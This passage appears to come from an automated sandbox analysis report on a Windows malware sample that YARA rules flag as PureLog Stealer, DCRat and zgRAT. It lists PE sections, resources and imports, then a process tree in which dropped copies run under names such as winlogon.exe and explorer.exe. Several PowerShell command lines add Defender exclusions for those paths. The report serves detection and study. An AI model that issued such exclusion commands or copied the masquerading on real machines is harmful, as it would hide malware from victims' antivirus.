                                                            .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
                                                            No network behavior found

                                                            Target ID:0
                                                            Start time:07:19:00
                                                            Start date:13/01/2025
                                                            Path:C:\Users\user\Desktop\DCobxod.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\DCobxod.exe"
                                                            Imagebase:0x410000
                                                            File size:36'950'717 bytes
                                                            MD5 hash:BC4A8996F18F14F3C77FFF13FD23B00D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2042681440.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2043620112.00000000074DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:07:19:02
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe"
                                                            Imagebase:0x3e0000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:07:19:04
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:07:19:04
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:07:19:04
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\intoHostperf.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Browserhost/intoHostperf.exe"
                                                            Imagebase:0x120000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2079779312.0000000000122000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Browserhost\intoHostperf.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\intoHostperf.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:07:19:15
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"
                                                            Imagebase:0x7ff6c2dc0000
                                                            File size:2'759'232 bytes
                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:07:19:15
                                                            Start date:13/01/2025
                                                            Path:C:\Recovery\upfc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\upfc.exe
                                                            Imagebase:0xbf0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\upfc.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\upfc.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:07:19:15
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Recovery\upfc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\upfc.exe
                                                            Imagebase:0xa80000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP"
                                                            Imagebase:0x7ff750960000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"
                                                            Imagebase:0x7ff6c2dc0000
                                                            File size:2'759'232 bytes
                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP"
                                                            Imagebase:0x7ff750960000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:28
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\Default\NetHood\explorer.exe
                                                            Imagebase:0x8a0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Has exited:true

                                                            Target ID:32
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\LaSqLWtOcizKrlm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Browserhost\LaSqLWtOcizKrlm.exe
                                                            Imagebase:0xc10000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Has exited:true

                                                            Target ID:36
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\LaSqLWtOcizKrlm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Browserhost\LaSqLWtOcizKrlm.exe
                                                            Imagebase:0x10000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:37
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:38
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:39
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:40
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:41
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:42
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:43
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:44
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:45
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:46
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:47
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:48
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:49
                                                            Start time:07:19:20
                                                            Start date:13/01/2025
                                                            Path:C:\ProgramData\SoftwareDistribution\winlogon.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            Imagebase:0x4c0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\SoftwareDistribution\winlogon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\SoftwareDistribution\winlogon.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Has exited:true

                                                            Target ID:50
                                                            Start time:07:19:20
                                                            Start date:13/01/2025
                                                            Path:C:\ProgramData\SoftwareDistribution\winlogon.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            Imagebase:0x7f0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:51
                                                            Start time:07:19:20
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat"
                                                            Imagebase:0x7ff7f4520000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:52
                                                            Start time:07:19:20
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:53
                                                            Start time:07:19:21
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff78f070000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:54
                                                            Start time:07:19:22
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\PING.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:ping -n 10 localhost
                                                            Imagebase:0x7ff7ece90000
                                                            File size:22'528 bytes
                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:55
                                                            Start time:07:19:24
                                                            Start date:13/01/2025
                                                            Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\Default\NetHood\explorer.exe
                                                            Imagebase:0x690000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:56
                                                            Start time:07:19:24
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\intoHostperf.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Browserhost\intoHostperf.exe
                                                            Imagebase:0x3c0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:57
                                                            Start time:07:19:25
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\intoHostperf.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Browserhost\intoHostperf.exe
                                                            Imagebase:0x410000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:78
                                                            Start time:07:20:21
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\Conhost.exe
                                                            Wow64 process (32bit):
